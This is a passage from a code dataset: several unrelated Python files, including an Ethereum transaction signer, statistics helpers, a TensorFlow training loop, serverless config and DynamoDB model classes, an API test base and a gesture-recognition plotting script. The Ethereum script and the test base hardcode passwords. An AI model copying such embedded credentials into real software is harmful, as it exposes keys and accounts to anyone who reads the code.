[Y/n] >> \")\n if not key or key.lower() == \"y\":\n continue\n else:\n exit(-1)\n if not transaction.get(\"gas\"):\n continue\n \"\"\"\n count wer\n \"\"\"\n os.system(CLEAR_TERMINAL)\n show_accounts()\n show_enter_data(transaction)\n while not transaction.get(\"value\"):\n try:\n count = int(input(\"Enter count WEI for transfer >> \"))\n except Exception:\n print(\"Error enter count WEI for transfer.\")\n else:\n if (count + transaction[\"gas\"] * transaction[\"gasPrice\"]) <= balance:\n transaction[\"value\"] = count\n correct = True\n else:\n print(\"Error enter count WEI, there is not enough money to make a transaction\")\n key = input(\"Re-enter? [Y/n] >> \")\n if not key or key.lower() == \"y\":\n continue\n else:\n exit(-1)\n if not transaction.get(\"value\"):\n continue\n os.system(CLEAR_TERMINAL)\n show_accounts()\n show_enter_data(transaction)\n\n transaction[\"nonce\"] = 12\n transaction[\"chainId\"] = '0x2a'\n \"\"\"\n keys\n \"\"\"\n key = node.get_private_key(name=transaction[\"from\"][2:], password=\"LbvfbDbnz2Xfirb\")\n s_transaction = node.sign_transaction(key=key, transaction=transaction)\n # node.node.personal.unlockAccount(transaction[\"from\"], \"XfirfNbcrbbJndthnrf1\")\n result = node.send_sign_transaction(transaction=s_transaction)\n print(result)\n\n\n\n if PROGECT_ROOT in sys.path:\n sys.path.remove(PROGECT_ROOT)\n","sub_path":"Test_etherium/signed_transaction.py","file_name":"signed_transaction.py","file_ext":"py","file_size_in_byte":5742,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"630064597","text":"from django.core.management.base import BaseCommand, CommandError\nfrom ltmo.models import Leak\n\nclass Command(BaseCommand):\n \"\"\"docstring for Command\"\"\"\n def handle(self, *args, **kwargs):\n leaks = Leak.objects.all()\n for l in leaks:\n self.stderr.write(\"Updating %s\" % l.pk)\n try:\n l.save()\n except (Exception, ) as e:\n self.stderr.write('%s' %e)\n","sub_path":"ltmo/management/commands/update.py","file_name":"update.py","file_ext":"py","file_size_in_byte":430,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"479564270","text":"import random\n\ncard_suits = [\"C\",\"S\",\"H\",\"D\"]\ncard_value = [\"A\", 2, 3, 4, 5, 6, 7, 8, 9, \"T\", \"J\", \"Q\", \"K\"]\ndeck = []\n\nfor i in card_suits:\n\tfor x in card_value:\n\t\tcard = str(x) + i\n\t\tdeck += [card]\nrandom.shuffle(deck)\nprint(deck)\n#print(len(deck))\n","sub_path":"environments/card_deck.py","file_name":"card_deck.py","file_ext":"py","file_size_in_byte":251,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"65644666","text":"#!/usr/bin/env python\n#\n# Copyright (c) 2013 Kyle Gorman \n#\n# Permission is hereby granted, free of charge, to any person obtaining a\n# copy of this software and associated documentation files (the\n# \"Software\"), to deal in the Software without restriction, including\n# without limitation the rights to use, copy, modify, merge, publish,\n# distribute, sublicense, and/or sell copies of the Software, and to\n# permit persons to whom the Software is furnished to do so, subject to\n# the following conditions:\n#\n# The above copyright notice and this permission notice shall be included\n# in all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS\n# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF\n# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.\n# IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY\n# CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,\n# TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE\n# SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.\n#\n# pystatsbase.py: shared functions for the pystats package\n\nfrom __future__ import division\n\nfrom bisect import bisect_left\nfrom math import exp, fsum, log\nfrom operator import itemgetter\n\n# user methods\n\n\ndef mean(n):\n \"\"\"\n Compute the mean of a sequence n. This avoids accumalating floating\n point imprecision but an overflow isn't out of the question.\n\n >>> mean([0, 5, 10])\n 5.0\n \"\"\"\n return fsum(n) / len(n)\n\n\ndef median(n):\n \"\"\"\n Compute median using an algorith from Numerical Methods in C. For\n favorable benchmarks, see:\n\n >>> median([1, 5, 10])\n 5\n >>> median([1, 4, 5, 10])\n 4.5\n \"\"\"\n sorten = sorted(n)\n length = len(n)\n if length % 2 == 0:\n return (sorten[length // 2] + sorten[length // 2 - 1]) / 2\n else:\n return sorten[length // 2]\n\n\ndef quickmedian(n):\n \"\"\"\n Compute \"lower\" median efficiently using an algorithm from Numerical\n Recipes in C. 
For favorable benchmarks, see:\n\n http://ndevilla.free.fr/median/median/index.html\n\n >>> quickmedian([1, 4, 5, 10])\n 4\n \"\"\"\n low = 0\n high = len(n) - 1\n median = (low + high) // 2\n middle = 0\n ll = 0\n hh = 0\n while True:\n # end cases\n if high <= low: # one element left\n return n[median]\n if high == low + 1: # two elements left\n if (n[low] > n[high]):\n (n[low], n[high]) = (n[high], n[low])\n return n[median]\n # find median of all three bins and swap into low cell thereof\n middle = (low + high) // 2\n if n[middle] > n[high]:\n (n[middle], n[high]) = (n[high], n[middle])\n if n[low] > n[high]:\n (n[low], n[high]) = (n[high], n[low])\n if n[middle] > n[low]:\n (n[middle], n[low]) = (n[low], n[middle])\n # swap low element in middle cell into cell low + 1\n (n[middle], n[low + 1]) = (n[low + 1], n[middle])\n # nibble from each end towards the middle, swapping when stuck\n ll = low + 1\n hh = high\n while True:\n while n[low] > n[ll]:\n ll += 1\n while n[hh] > n[low]:\n hh -= 1\n if hh < ll:\n break\n (n[ll], n[hh]) = (n[hh], n[ll])\n # swap middle item in low cell back into correct position\n (n[low], n[hh]) = (n[hh], n[low])\n # reset active partition\n if hh <= median:\n low = ll\n if hh >= median:\n high = hh - 1\n\n\ndef rank(n):\n \"\"\"\n Return ranks for vector n; tied values receive the average of their ranks\n \"\"\"\n (ivec, svec) = zip(*sorted(list(enumerate(n)), key=itemgetter(1)))\n sumranks = 0\n dupcount = 0\n newlist = [0] * len(n)\n for i in xrange(len(n)):\n sumranks += i\n dupcount += 1\n if i == len(n) - 1 or svec[i] != svec[i + 1]:\n averank = sumranks / dupcount + 1\n for j in xrange(i - dupcount + 1, i + 1):\n newlist[ivec[j]] = averank\n sumranks = 0\n dupcount = 0\n return newlist\n\n\ndef sample_variance(n):\n \"\"\"\n Single-pass method using the computational formula for the sample\n variance (described on Wikipedia)\n \"\"\"\n y_squared_dot = sum(i * i for i in n)\n y_dot_squared = sum(n) ** 2\n return (y_squared_dot - y_dot_squared / len(n)) / (len(n) - 1)\n\n\ndef sse(n, mu):\n \"\"\"\n Returns sum of squared errors\n\n >>> sse([0, 5, 10], 0)\n 125.0\n \"\"\"\n return fsum((i - mu) ** 2 for i in n)\n\nif __name__ == '__main__':\n import doctest\n doctest.testmod()\n","sub_path":"pystatsbase.py","file_name":"pystatsbase.py","file_ext":"py","file_size_in_byte":4636,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
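Two spot checks for the less obvious functions above, in the module's own doctest style (rank uses xrange, so this is Python 2 code): rank gives tied values the average of their ranks, and sample_variance implements the one-pass formula (Σy² − (Σy)²/n) / (n − 1).

```python
>>> rank([10, 20, 20, 30])   # the two 20s share ranks 2 and 3
[1.0, 2.5, 2.5, 4.0]
>>> sample_variance([2, 4, 4, 4, 5, 5, 7, 9])   # 32/7
4.571428571428571
```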
+{"seq_id":"369308892","text":"import numpy as np\nimport tensorflow as tf\nimport math\nfrom random import shuffle\nimport os\nimport random\nimport sys\nimport time\n\nsys.path.append('../')\nimport common.statics as stat\nimport tensorflow.contrib.slim as slim\n\n\n\n\ndef read_and_decode(filename_queue, batch_size):\n \n reader = tf.TFRecordReader()#\n _, serialized_example = reader.read(filename_queue)#\n features = tf.parse_single_example(\n serialized_example,\n # Defaults are not specified since both keys are required.\n features={\n 'content': tf.FixedLenFeature([], tf.string),\n 'label': tf.FixedLenFeature([], tf.string),\n })\n \n content = tf.decode_raw(features['content'], tf.float32)\n label = tf.decode_raw(features['label'], tf.float32)\n \n content = tf.reshape(content, [20,500,1024])\n label = tf.reshape(label, [1948])\n \n min_after_dequeue = 0\n capacity = min_after_dequeue + 3 * batch_size\n \n tcontent, tlabel = tf.train.shuffle_batch([content, label],\n batch_size=batch_size,\n capacity=16,\n num_threads=3,\n min_after_dequeue=min_after_dequeue)\n \n \n return tcontent, tlabel\n\n\nBatch_SIZE = 8\nN_EPOCH = 100\nTRAINTEST_RATIO = 0.8\n\ntf_record_path = '/media/ubuntu/65db2e03-ffde-4f3d-8f33-55d73836211a/dataset/ts_cases_dataset/cnn_enc'\n\ntrain_list = stat.loadfrompickle('t1t2_train_list.pickle')\ntest_list = stat.loadfrompickle('t1t2_test_list.pickle')\n\n\nwith tf.name_scope('Train_Batch'):\n train_filename_queue = tf.train.string_input_producer(train_list, num_epochs=N_EPOCH) \n tftrain_batch, tftrain_labels = read_and_decode(train_filename_queue, Batch_SIZE)\n\n\n \n learning_rate = tf.placeholder(tf.float32, shape=[], name='learning_rate')\n keep_prob = tf.placeholder(tf.float32, name='dropout_prob')\n is_training = tf.placeholder(tf.bool, name='is_training')\n \n \n def build_model(inputs):\n \n \n net = slim.repeat(inputs, 1, slim.conv2d, 1024 , [5, 1], scope='conv1')\n net = tf.nn.max_pool(net, [1,3, 1,1], [1,2,1,1], padding='VALID', name='pool1')\n net = slim.repeat(net, 1, slim.conv2d, 512 , [5, 1], scope='conv2')\n net = tf.nn.max_pool(net, [1,5, 1,1], [1,3,1,1], padding='VALID', name='pool2')\n net = slim.repeat(net, 1, slim.conv2d, 1024 , [2, 1], scope='conv3')\n net = tf.nn.max_pool(net, [1,2, 1,1], [1,2,1,1], padding='VALID', name='pool3')\n \n \n net = slim.repeat(net, 1, slim.conv2d, 1024, [1, 5], scope='conv4')\n net = tf.nn.max_pool(net, [1,1, 5,1], [1,1,3,1], padding='VALID', name='pool4')\n \n net = slim.repeat(net, 1, slim.conv2d, 1024, [1, 5], scope='conv5')\n net = tf.nn.max_pool(net, [1,1, 5,1], [1,1,3,1], padding='VALID', name='pool5')\n \n net = slim.repeat(net, 1, slim.conv2d, 1024, [1, 5], scope='conv6')\n net = tf.nn.max_pool(net, [1,1, 5,1], [1,1,3,1], padding='VALID', name='pool6')\n \n net = slim.repeat(net, 1, slim.conv2d, 1024, [1, 5], scope='conv7')\n net = tf.nn.max_pool(net, [1,1, 5,1], [1,1,3,1], padding='VALID', name='pool7')\n \n net = tf.reshape(net, [-1, int(np.prod(net.get_shape()[1:]))])\n \n \n fc6W = tf.Variable(tf.random_normal([5120,2048]), tf.float32)\n fc6b = tf.Variable(tf.random_normal([2048]), tf.float32)\n fc7W = tf.Variable(tf.random_normal([2048,2048]))\n fc7b = tf.Variable(tf.random_normal([2048]))\n fc8W = tf.Variable(tf.random_normal([2048,1948]))\n fc8b = tf.Variable(tf.random_normal([1948]))\n \n \n net = tf.nn.relu_layer(net, fc6W, fc6b , name='fc6') \n net = tf.layers.dropout(net, rate=keep_prob, training=is_training, name='dropout1')\n net = tf.nn.relu_layer(net, fc7W, fc7b, name='fc7')\n net = 
tf.layers.dropout(net, rate=keep_prob, training=is_training, name='dropout2')\n \n logits = tf.nn.xw_plus_b(net, fc8W, fc8b, name='fc8') \n return logits\n \n \n def calc_loss(logits, labels):\n \n os_label = tf.slice(labels, [0,0],[-1,93])\n cat_label = tf.slice(labels, [0,93],[-1,22])\n model_label =tf.slice(labels, [0,115],[-1,1833])\n \n os_logits = tf.slice(logits, [0,0],[-1,93])\n cat_logits = tf.slice(logits, [0,93],[-1,22])\n model_logits =tf.slice(logits, [0,115],[-1,1833])\n \n with tf.name_scope('Cross_Entropy_Loss'):\n \n loss_os = tf.nn.softmax_cross_entropy_with_logits(labels=os_label, logits=os_logits)\n loss_cat = tf.nn.softmax_cross_entropy_with_logits(labels=cat_label, logits=cat_logits)\n loss_model = tf.nn.softmax_cross_entropy_with_logits(labels=model_label, logits=model_logits)\n \n loss = tf.reduce_mean(loss_os + loss_cat + loss_model)\n \n return loss, [os_logits, cat_logits, model_logits], [os_label, cat_label, model_label]\n \nwith tf.device('/gpu:0'):\n \n with tf.variable_scope('cnn_reader') as scope:\n \n logits_for_train = build_model(tftrain_batch)\n\n\n with tf.name_scope('Optimizer'):\n \n loss, _, _ = calc_loss(logits_for_train, tftrain_labels)\n optimizer = tf.train.AdamOptimizer(learning_rate=learning_rate)\n solver = optimizer.minimize(loss)\n \n \nwith tf.name_scope('train_summary'):\n \n tf.summary.scalar(\"Cross_Entropy\", loss, collections=['train'])\n merged_summary_train = tf.summary.merge_all('train') \n\n\n \n \nmodel_path = '/media/ubuntu/65db2e03-ffde-4f3d-8f33-55d73836211a/ts_case_project/model/cnn_reader/'\ncheckpoint_dir = os.path.join(model_path, 'model')\ncheckpoint_filename = os.path.join(checkpoint_dir, 'cnn_reader_v1.ckpt')\nlogfile = os.path.join(model_path, 'log')\n\n\niteration = 46000\ncontinue_training = 1\nconfig = tf.ConfigProto()\nconfig.gpu_options.allow_growth=True\nconfig.gpu_options.per_process_gpu_memory_fraction = 0.9\n\ninit_op = tf.group(tf.global_variables_initializer(),\n tf.local_variables_initializer())\n\nwith tf.Session(config=config) as sess:\n \n summary_writer = tf.summary.FileWriter(logfile, sess.graph)\n saver = tf.train.Saver()\n sess.run(init_op) \n \n if continue_training !=0:\n saver.restore(sess, tf.train.latest_checkpoint(checkpoint_dir))\n continue_training = 0\n \n coord = tf.train.Coordinator()\n threads = tf.train.start_queue_runners(sess=sess, coord=coord) \n \n try:\n while not coord.should_stop():\n \n iteration = iteration + 1\n print(\"Iteration:{}\".format(iteration))\n \n s = time.clock()\n feed_dict = {learning_rate:1e-4, keep_prob:0.5, is_training:True}\n sess.run(solver, feed_dict=feed_dict)\n e = time.clock()\n\n print(\"Train time\", e-s)\n \n if iteration%200 == 0: #Train summary\n \n train_loss, train_sum = sess.run([loss, merged_summary_train], feed_dict=feed_dict)\n print(\"Train Loss:{}\".format(train_loss))\n summary_writer.add_summary(train_sum, iteration)\n saver.save(sess, checkpoint_filename, global_step=iteration)\n \n\n \n except tf.errors.OutOfRangeError:\n print('Done training -- epoch limit reached')\n finally:\n coord.request_stop()\n\n \ncoord.request_stop()\ncoord.join(threads) \nsummary_writer.close()\nsess.close() \n\n \n \n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n \n","sub_path":"ts_case_model/CNN_encode/train_cnnreader_v2.py","file_name":"train_cnnreader_v2.py","file_ext":"py","file_size_in_byte":7867,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"308480749","text":"import logging\n\nfrom pathlib import Path\n\nfrom cirrus.cli.constants import (\n DEFAULT_CONFIG_FILENAME,\n SERVERLESS_PLUGINS,\n)\nfrom cirrus.cli.exceptions import ConfigError\nfrom cirrus.cli.utils.yaml import NamedYamlable\n\n\nlogger = logging.getLogger(__name__)\n\n\nDEFAULT_CONFIG_PATH = Path(__file__).parent.joinpath('default.yml')\n\n\nclass Config(NamedYamlable):\n @classmethod\n def default(cls):\n return cls.from_file(DEFAULT_CONFIG_PATH)\n\n @classmethod\n def from_project(cls, project):\n return cls.from_file(\n project.path.joinpath(DEFAULT_CONFIG_FILENAME),\n )\n\n def validate(self) -> None:\n # set defaults\n self.functions = {}\n self.stepFunctions = dict(validate=True, stateMachines={})\n self.resources = dict(\n Description='Cirrus STAC Processing Framework',\n Resources={},\n Outputs={},\n )\n\n # populate required plugin list\n try:\n self.plugins.extend(SERVERLESS_PLUGINS.keys())\n except AttributeError:\n self.plugins = list(SERVERLESS_PLUGINS.keys())\n else:\n # deduplicate\n self.plugins = list(set(self.plugins))\n\n def build(self, collections):\n # add all components and resources\n copy = self.copy()\n for collection in collections:\n copy.register(collection)\n return copy\n\n def register(self, collection) -> None:\n from cirrus.cli.components.base import Lambda, StepFunction\n from cirrus.cli.resources import Resource, Output\n if issubclass(collection, Lambda):\n self.register_lambda_collection(collection)\n elif issubclass(collection, StepFunction):\n self.register_step_function_collection(collection)\n elif issubclass(collection, Resource):\n self.resources.Resources = {e.name: e.definition for e in collection.values()}\n elif issubclass(collection, Output):\n self.resources.Outputs = {e.name: e.definition for e in collection.values()}\n else:\n raise ConfigError(\n f\"Unable to register collection '{collection.name}': unknown type '{collection.type}'\",\n )\n\n def register_lambda_collection(self, lambda_collection) -> None:\n for lambda_component in lambda_collection.values():\n self.register_lambda(lambda_component)\n\n def register_lambda(self, lambda_component) -> None:\n if not lambda_component.lambda_enabled:\n logging.debug(\n \"Skipping disabled lambda: '%s'\",\n lambda_component.display_name,\n )\n return\n\n if lambda_component.name in self.functions and not lambda_component.is_core_component:\n logging.warning(\n \"Duplicate lambda declaration: '%s', skipping\",\n lambda_component.display_name,\n )\n return\n\n self.functions[lambda_component.name] = lambda_component.lambda_config\n\n def register_step_function_collection(self, sf_collection) -> None:\n for sf_component in sf_collection.values():\n self.register_step_function(sf_component)\n\n def register_step_function(self, sf_component) -> None:\n if sf_component.name in self.stepFunctions.stateMachines and not sf_component.is_core_component:\n logging.warning(\n f\"Duplicate step function declaration '{sf_component.display_name}', skipping\",\n )\n return\n self.stepFunctions.stateMachines[sf_component.name] = sf_component.config\n","sub_path":"cirrus/cli/config/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":3604,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"23456400","text":"from pynamodb.models import Model\nfrom pynamodb.attributes import UnicodeAttribute\nfrom pynamodb.attributes import NumberAttribute\nfrom pynamodb.attributes import BooleanAttribute\nfrom pynamodb.attributes import JSONAttribute\nimport json\n\n\ndef set_aws_host(aws_host):\n DeploymentModel.Meta.host = aws_host\n\n\ndef set_aws_region(aws_region):\n DeploymentModel.Meta.region = aws_region\n\n\nclass OrderedJsonAttribute(JSONAttribute):\n \"\"\"\n An override of the JsonAttribute type to ensure the dumps are ordered by keys\n This matters given we're using JsonAttributes as a range key\n \"\"\"\n def serialize(self, value):\n\n \"\"\"\n Serializes JSON to unicode\n \"\"\"\n if value is None:\n return None\n encoded = json.dumps(value, sort_keys=True)\n try:\n return unicode(encoded)\n except NameError:\n return encoded\n\n\nclass DeploymentModel(Model):\n class Meta:\n table_name = 'GroundControlDeployment'\n\n service = UnicodeAttribute(hash_key=True)\n range_keys = OrderedJsonAttribute(range_key=True)\n cluster = UnicodeAttribute()\n version = UnicodeAttribute()\n project = UnicodeAttribute(default=\"unknown\")\n deployment_id = UnicodeAttribute()\n desired_count = NumberAttribute(default=0)\n running_count = NumberAttribute(default=0)\n task_definition = UnicodeAttribute()\n active = BooleanAttribute(default=True)\n status = UnicodeAttribute(default=\"SCALING\")\n loadbalancer_config = OrderedJsonAttribute(null=True)\n\n @classmethod\n def from_dict(cls, data):\n return cls(\n range_keys={\n \"cluster\": data['cluster'],\n \"version\": data['version'],\n },\n **data\n )\n\n def as_dict(self):\n return {\n \"deployment_id\": self.deployment_id,\n \"project\": self.project,\n \"service\": self.service,\n \"version\": self.version,\n \"cluster\": self.cluster,\n \"task_definition\": self.task_definition,\n \"loadbalancer_config\": self.loadbalancer_config,\n \"desired_count\": self.desired_count,\n \"running_count\": self.running_count,\n \"status\": self.status\n }\n","sub_path":"groundcontrol/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2248,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"9167579","text":"import json\nimport requests\nfrom django.test.testcases import TestCase\nimport os\nfrom integration.core.constants import AfterbuyUrls\n\n\nclass AfterBuyResourceTestCase(TestCase):\n\n def setUp(self):\n self.base_version = 'http://{0}/afterbuy/v1/'.format(os.environ.get('SERVER_NAME',\n 'local.api.afterbuy.co:8000'))\n\n def assertSuccess(self, first, msg=None):\n if int(first) < 200 or int(first) > 299:\n raise self.failureException(msg)\n\n def login(self, dct=None):\n if dct is None:\n dct = {\"phone_number\": \"9999999999\", \"password\": \"afterbuy\"}\n resp = requests.post(self.base_version+AfterbuyUrls.LOGIN, data=json.dumps(dct),\n headers={'content_type': 'application/json'})\n self.assertSuccess(resp.status_code)\n return json.loads(resp.content)['access_token']\n\n def post(self, uri, content_type='application/json', data=None,\n headers={'content_type': 'application/json'}, params={}):\n headers.update({'access_token': self.login()})\n resp = requests.post(self.base_version+uri, data=json.dumps(data), headers=headers)\n self.assertSuccess(resp.status_code)\n return json.loads(resp.content)\n\n def get(self, uri, content_type='application/json',\n headers={'content_type':'application/json'}, params={}):\n headers.update({'access_token': self.login()})\n resp = requests.get(self.base_version+uri, headers=headers, params=params)\n self.assertSuccess(resp.status_code)\n return json.loads(resp.content)\n\n def delete(self, uri, content_type='application/json',\n headers={'content_type':'application/json'}, params={}):\n headers.update({'access_token': self.login()})\n resp = requests.delete(self.base_version+uri, headers=headers, params=params)\n self.assertSuccess(resp.status_code)\n","sub_path":"tests/smoke/afterbuy/base_integration.py","file_name":"base_integration.py","file_ext":"py","file_size_in_byte":1925,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"511124454","text":"import sys\nimport numpy as np \nimport matplotlib.pyplot as plt \nimport matplotlib as mpl\nimport matplotlib.font_manager as font_manager\nfrom scipy.io import loadmat\nfrom sklearn.metrics import confusion_matrix, accuracy_score\nfrom itertools import product\nimport pickle\nimport pims\nimport cv2\nimport matplotlib as mpl\n# from context import draw_ballpose, draw_bodypose, draw_class, draw_hand_center, draw_handpose, draw_head\n#mpl.use('Agg')\nmpl.style.use(\"seaborn\")\n\ndef plot_probabilities(probs,pred, label):\n plt.plot(probs)\n plt.legend(['act {}'.format(i) for i in range(1,13)], loc='upper right')\n plt.title(\"Label = {} / Predicted = {}\".format(label+1,pred+1))\n\n#def plot_conf_matrix(predictions, labels): pass\n\ndef anticipate(probabilities, th = 0.9, uncert = True):\n if uncert:\n _,_,mi= calc_uncertainties(probabilities)\n if mi < th: return (True, probabilities.mean(0).argmax(),probabilities.mean(0).max(),mi)\n return (False, -1, probabilities.mean(0).max(), mi)\n else: \n if probabilities.max() > th:\n return (True, probabilities.argmax(),probabilities.max(), 0)\n return (False, -1, 0, probabilities.max())\n\n\n\n\ndef generate_video():\n stochastic = pickle.load(open(\"results/mc_dropout.pkl\", 'rb'), encoding=\"bytes\")\n deterministic = pickle.load(open(\"results/prediction_m_g_b.pkl\", 'rb'), encoding=\"bytes\")\n stochastic.sort(key = lambda d:d[b'interval'][0])\n deterministic.sort(key = lambda d:d[b'interval'][0])\n \n fourcc = cv2.VideoWriter_fourcc(*'XVID')\n out = cv2.VideoWriter('selected.avi',fourcc, 15.0, (1280,480))\n chosen = [2988, 6155,1476, 2096, 6394, 30,74, 6210, 1562, 2178, 1108,6442, 6499,8686,9152, 13919, 10228]\n\n actions = {\n 1: \"Pedido de ajuda\",\n 2: \"Venha aqui\",\n 3: \"Pode sair\",\n 4: \"Siga-me\",\n 5: \"Pare\",\n 6: \"Abortar missão\",\n 7: \"Bom\",\n 8: \"Não\",\n 9: \"Ruim\",\n 10:\"Dar passagem\",\n 11:\"Apontar\",\n 12:\"Dúvida\",\n 13:\"Mais alto\",\n 14:\"Mais baixo\",\n 15:\"Silêncio\",\n } \n\n # actions = {\n # 1:\"Ask\",\n # 2:\"Come_Here\",\n # 3:\"Leave\",\n # 4:\"Follow\",\n # 5:\"Stop\",\n # 6:\"Abort\",\n # 7:\"Good\",\n # 8:\"No\",\n # 9:\"Bad\",\n # 10:\"Give_way\",\n # 11:\"Pointing\",\n # 12:\"Doubt\",\n # 13:\"Louder\",\n # 14:\"Quieter\",\n # 15:\"Be_quiet\"\n # }\n\n\n\n\n colors = [\"green\", \"black\", \"red\", \"blue\", \"brown\", \"indigo\",\"coral\",\"lime\",\"orangered\",\"yellow\", \"navy\",\"salmon\",\"gray\",\"darkorange\",\"deepskyblue\"]\n font = font_manager.FontProperties(weight='normal',\n style='normal', size=10)\n font_act = font_manager.FontProperties(weight='bold',\n style='normal', size=10)\n box = dict(boxstyle='round', facecolor='wheat', alpha=0.5)\n frame_count = -1\n for det, stoc in zip(deterministic, stochastic):\n label = stoc[b'label']\n det_prob = det[b'probs']\n stoc_prob = stoc[b'probs']\n begin,end= stoc[b'interval']\n if begin not in chosen: continue\n mean = stoc_prob.mean(1)\n std = stoc_prob.std(1)\n std_up = np.clip(mean+std,0.0,1.0)\n std_down = np.clip(mean-std,0.0,1.0)\n indexes = np.arange(len(mean))\n lines=[]\n print(indexes.shape,std_up.shape,std_down.shape)\n det_ant = -1\n stoc_ant = -1\n act_s = -1\n act_s = -1\n frame_count = begin-1\n \n\n for i in range(len(mean)):\n frame_count += 1\n fig, axis = plt.subplots(2,1,facecolor=(0.8, 0.8, 0.8))\n axis[0].set_xlim([0,len(det_prob)])\n axis[1].set_xlim([0,len(stoc_prob)])\n axis[0].set_ylim([0.0,1.0])\n axis[1].set_ylim([0.0,1.0])\n axis[0].set_xlabel(\"Frame\", weight=\"bold\")\n 
axis[1].set_xlabel(\"Frame\", weight=\"bold\")\n axis[0].set_ylabel(\"Probability\", weight=\"bold\")\n axis[1].set_ylabel(\"Probability\", weight=\"bold\")\n plt.subplots_adjust(hspace=1.2)\n axis[1].plot([0,len(det_prob)],[0.9,0.9],linestyle='-',color=\"b\", linewidth=1) \n fig.suptitle(\"Action {} - ({})\".format(label+1,actions[label+1]), fontsize=15, weight=\"bold\")\n\n for v in range(12): \n line, = axis[0].plot(mean[:i,v], color=colors[v])\n axis[0].fill_between(indexes[:i],std_up[:i,v], std_down[:i,v], alpha=0.3, facecolor=colors[v])\n axis[1].plot(det_prob[:i,v], color=colors[v])\n if len(lines) < len(colors):lines.append(line)\n if det_ant == -1:\n ant_d,act_d,prob_d,_ = anticipate(det_prob[i],0.9,False)\n if stoc_ant == -1:\n ant_s,act_s, prob_s, uncertainty = anticipate(stoc_prob[i],0.5,True)\n else: _,_, _, uncertainty = anticipate(stoc_prob[i],0.5,True)\n \n \n if ant_s or stoc_ant> -1:\n if stoc_ant == -1:\n stoc_ant = i\n plot_anticipation(axis[0], prob_s, stoc_ant)\n tx,ty = [2, 0.83] if stoc_ant>0.5 else [stoc_ant+3,0.83]\n axis[0].text(2,0.75 , \" Act. {} at Frame {}\".format(act_s+1,stoc_ant+1),fontproperties = font_act, bbox = box)\n if act_s == label:\n axis[0].text(2,0.75 , \"V\",bbox = box, fontproperties = font_act,color = \"g\")\n else:\n axis[0].text(2,0.75 , \"X\",bbox = box, fontproperties = font_act,color = \"r\")\n \n if ant_d or det_ant>-1:\n if det_ant == -1:det_ant = i\n plot_anticipation(axis[1], prob_d, det_ant)\n tx,ty = [2, 0.83] if det_ant>0.5 else [det_ant+3,0.83]\n axis[1].text(2,0.75 , \" Act. {} at Frame {}\".format(act_d+1,det_ant+1),fontproperties = font_act, bbox = box)\n if act_d == label:\n axis[1].text(2,0.75 , \"V\",bbox = box, fontproperties = font_act,color = \"g\")\n else:\n axis[1].text(2,0.75 , \"X\",bbox = box, fontproperties = font_act,color = \"r\")\n \n axis[0].set_title(\"Stochastic Model - Uncertainty = {:.2f}\".format(uncertainty), weight=\"bold\")\n axis[1].set_title(\"Deterministic Model\", weight=\"bold\")\n\n\n fig.legend(lines, [\"{} - {}\".format(i,actions[i]) for i in range(1,len(colors)+1)], loc='center', \\\n prop = font, ncol = 4, shadow=True, frameon=True, fancybox=True)\n\n frame = framesw[frame_count]\n # plt.legend(['act {}'.format(i) for i in range(1,probs.shape[1]+1)], loc='upper right')\n # #print(entropy(probs[i]))\n fig.canvas.draw()\n img = np.fromstring(fig.canvas.tostring_rgb(), dtype=np.uint8,sep='')\n img = img.reshape(fig.canvas.get_width_height()[::-1] + (3,))\n #img = cv2.cvtColor(img,cv2.COLOR_RGB2BGR)\n img_plot = cv2.resize(img, (640, 480))\n image = np.concatenate((img_plot,frame),axis=1)\n out.write(image[:,:,[2,1,0]])\n # cv2.imshow(\"Action Dataset\",image[:,:,[2,1,0]])\n # cv2.waitKey(10)\n plt.close()\n \n\n\n\n\n\ndef plot_anticipation(axis, acc,frame):\n axis.plot([0,frame],[acc,acc],linestyle='--',color=\"k\", linewidth=1)\n axis.plot([frame,frame],[0,acc],linestyle='--',color=\"k\", linewidth=1)\n \n\n\n\n\ndef show_video(frames, probs,probs_u, begin,end):\n fourcc = cv2.VideoWriter_fourcc(*'XVID')\n out = cv2.VideoWriter('test_{}.avi'.format(int(begin)),fourcc, 5.0, (1280,480))\n \n #labels_body = np.load(\"labels_body.npy\").astype(int)\n fig, axis = plt.subplots(2,1,facecolor=(0.6843, 0.9098, 0.9098))\n axis[0].set_xlim([0,len(probs)])\n axis[1].set_xlim([0,len(probs)])\n axis[0].set_ylim([0.0,1.0])\n axis[1].set_ylim([0.0,1.0])\n axis[0].set_xlabel(\"Frame\")\n axis[1].set_xlabel(\"Frame\")\n axis[0].set_ylabel(\"Probability\")\n axis[1].set_ylabel(\"Probability\")\n\n draw_hand = 
